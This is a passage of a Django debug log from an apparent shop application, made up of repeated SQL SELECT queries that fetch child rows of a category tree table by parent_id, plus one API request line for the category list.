"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:27:33,462 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:27:33,464 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:27:33,466 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:27:33,469 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:27:33,472 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:27:33,474 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:27:33,476 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:27:33,478 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:27:33,481 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:27:33,485 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:27:33,487 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:27:33,489 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:27:33,492 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:27:33,494 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:27:33,498 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:27:33,500 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:27:33,502 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:27:33,504 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:27:33,507 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:27:33,510 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:27:33,512 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:27:33,514 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:27:33,517 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:27:33,519 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:27:33,522 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:27:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:27:34,101 utils 31585 139762228295424 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:27:34,108 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:27:34,115 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:27:34,119 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:27:34,125 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:27:34,130 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:27:34,134 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:27:34,138 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:27:34,142 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:27:34,148 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:27:34,152 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:27:34,156 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:27:34,160 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:27:34,164 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:27:34,170 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:27:34,174 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:27:34,177 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:27:34,182 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:27:34,186 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:27:34,192 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:27:34,196 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:27:34,200 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:27:34,203 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:27:34,207 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:27:34,211 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:27:34,217 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:27:34,221 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:27:34,225 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:27:34,228 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:27:34,232 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:27:34,238 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:27:34,242 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:27:34,246 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:27:34,250 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:27:34,253 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:27:34,260 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:27:34,264 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:27:34,268 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:27:34,271 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:27:34,275 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:27:34,279 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:27:34,284 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" 